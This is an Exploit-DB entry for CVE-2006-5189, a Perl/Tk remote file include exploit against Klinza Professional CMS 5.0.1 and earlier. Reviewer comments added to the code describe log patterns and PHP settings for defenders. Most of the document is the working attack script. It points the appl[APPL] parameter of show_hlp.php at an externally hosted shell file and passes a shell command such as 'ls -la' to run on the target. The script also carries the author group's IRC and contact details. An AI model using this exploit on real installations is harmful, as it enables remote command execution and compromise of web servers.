Klinza Professional CMS <= 5.0.1 - show_hlp.php File Include Exploit

2006-10-03T00:00:00
ID EDB-ID:2472
Type exploitdb
Reporter Kacper
Modified 2006-10-03T00:00:00

Description

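Klinza Professional CMS <= 5.0.1 (show_hlp.php) File Include Exploit. CVE-2006-5189. Web application exploit for the PHP platform. The Perl/Tk script below builds a URL that sets the appl[APPL] query parameter of funzioni/lib/show_hlp.php to a file hosted on another server and hands that URL to the local "start" command; a URL value in that parameter is the pattern to look for in web-server logs.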

                                        
                                            #!/usr/bin/perl

#:::::::::  :::::::::: :::     ::: ::::::::::: :::        
#:+:    :+: :+:        :+:     :+:     :+:     :+:        
#+:+    +:+ +:+        +:+     +:+     +:+     +:+        
#+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
#+#+    +#+ +#+         +#+   +#+      +#+     +#+        
##+#    #+# #+#          #+#+#+#       #+#     #+#        
##########  ##########     ###     ########### ########## 
#::::::::::: ::::::::::     :::     ::::    ::::  
#    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
#    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
#    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
#    +#+     +#+        +#+     +#+ +#+       +#+ 
#    #+#     #+#        #+#     #+# #+#       #+# 
#    ###     ########## ###     ### ###       ### 
#	
#	
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Klinza Professional CMS <= 5.0.1 (show_hlp.php) Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Klinza Professional CMS 5.0.1
#- [Script site: http://sourceforge.net/project/showfiles.php?group_id=121246
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
#+
#-          Contact: kacper1964@yahoo.pl
#-                        or
#-           http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#-                 SkD, nukedclx, Ramzes
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;


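# Build the Tk front end: a fixed-size window with three editable fields
# (script path, shell path, command) and one button wired to akcja().
# This block sends nothing; it lays out widgets and then enters the Tk
# event loop.
#
# NOTE(review): the listing was HTML-escaped on the page ("&gt;" / "&lt;");
# the "->", "=>" and "<=" tokens below are restored so the code reads as Perl.
# NOTE(review): LWP::UserAgent is loaded at the top of the file but is not
# used anywhere in this block.
$mw = MainWindow->new(title => "DEVIL TEAM :: Klinza Professional CMS <= 5.0.1 (show_hlp.php) Remote File Include Exploit :: by Kacper ;-)  " );

$mw->geometry('500x300');
$mw->resizable(0, 0);    # fixed size in both directions

$mw->Label(-text => 'Klinza Professional CMS <= 5.0.1 (show_hlp.php) Remote File Include Exploit by Kacper', -font => '{Verdana} 7 bold', -foreground => 'blue')->pack();
$mw->Label(-text => '')->pack();

# Two side-by-side columns: captions on the left, input widgets on the right.
$fleft  = $mw->Frame()->pack(-side => 'left', -anchor => 'ne');
$fright = $mw->Frame()->pack(-side => 'left', -anchor => 'nw');

# Default field values; kept as package globals because akcja() reads them.
# akcja() concatenates them as $url . $shell_path . $cmd, so the resulting
# request sets the appl[APPL] query parameter of funzioni/lib/show_hlp.php
# to an external http:// URL. For defenders, that shape (a URL inside
# appl[APPL] on a request for show_hlp.php) is what to search web-server
# logs for on Klinza Professional CMS <= 5.0.1 installs (CVE-2006-5189).
# The host names below are the author's placeholders.
# NOTE(review): the vulnerable PHP is not shown on this page; the title calls
# it a remote file include, so PHP's allow_url_include / allow_url_fopen
# settings are the controls to check -- confirm against the application.
# Whether a fixed release exists is not stated here.
$url        = 'http://www.site.com/[Klinza_path]/funzioni/lib/show_hlp.php?appl[APPL]=';
$shell_path = 'http://server/shell.txt?';
$cmd        = 'ls -la';

# One caption + entry pair per field, created in the same order as the
# original listing (label first, then the entry bound to its variable).
for my $row (
    [ 'Script Path: ', \$url ],
    [ 'Shell Path: ',  \$shell_path ],
    [ 'CMD: ',         \$cmd ],
) {
    my ($caption, $var_ref) = @{$row};
    $fleft->Label(-text => $caption, -font => '{Verdana} 8 bold')->pack(-side => 'top', -anchor => 'e');
    $fright->Entry(-relief => 'groove', -width => 35, -font => '{Verdana} 8', -textvariable => $var_ref)->pack(-side => 'top', -anchor => 'w');
}

# Blank spacer rows under the fields.
$fright->Label(-text => ' ')->pack();
$fleft->Label(-text => ' ')->pack();

# The only action in the GUI: clicking the button calls akcja().
$fright->Button(
    -text             => 'Exploit Include Vulnerability',
    -relief           => 'groove',
    -width            => '30',
    -font             => '{Verdana} 8 bold',
    -activeforeground => 'red',
    -command          => \&akcja,
)->pack();

# Spacer, then the author's credit lines.
$fright->Label(-text => ' ')->pack();
for my $credit (
    'Exploit coded by Kacper',
    'DEVIL TEAM :: The Best Polish Team',
    'http://www.rahim.webd.pl/',
) {
    $fright->Label(-text => $credit, -font => '{Verdana} 7')->pack();
}

MainLoop();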


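# Button callback: builds an informational dialog, passes the concatenated
# field values to the local "start" command, then shows the dialog.
# Takes no arguments and reads the package globals $mw, $url, $shell_path
# and $cmd. The return value is whatever the dialog's Show() returns.
#
# NOTE(review): the listing was HTML-escaped on the page ("&gt;" / "&lt;");
# the "->" and "=>" tokens are restored here. The empty prototype was dropped;
# the sub is only referenced as a code ref (\&akcja), where prototypes are
# not applied.
sub akcja
{
    my $dialog = $mw->DialogBox(-title => 'DEVIL TEAM :: Exploit by Kacper ;-) ', -buttons => ["OK"]);

    # Dialog body: author's contact lines separated by empty labels, in the
    # same order as the original listing.
    for my $line (
        'Enter to DEVIL TEAM IRC CHANNEL: 72.20.18.6:6667 #devilteam',
        '',
        'DEVIL TEAM SITE: http://www.rahim.webd.pl/',
        '',
        '',
        'Greetz For my friends ;-)',
        '',
    ) {
        $dialog->add('Label', -text => $line, -font => '{Verdana} 8')->pack;
    }

    # Single-string system() goes through the local shell. "start" is a
    # Windows cmd built-in, so this line only does something on Windows,
    # where it hands the string to the default URL handler. The three field
    # values are interpolated unquoted, so shell metacharacters typed into
    # the GUI are interpreted by the operator's own shell.
    # NOTE(review): no HTTP client code runs here despite the LWP::UserAgent
    # import at the top of the file; the request comes from whatever program
    # handles the URL, so the User-Agent seen in server logs is presumably
    # that program's, not a Perl one.
    system("start $url$shell_path$cmd");

    $dialog->Show();
}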

# milw0rm.com [2006-10-03]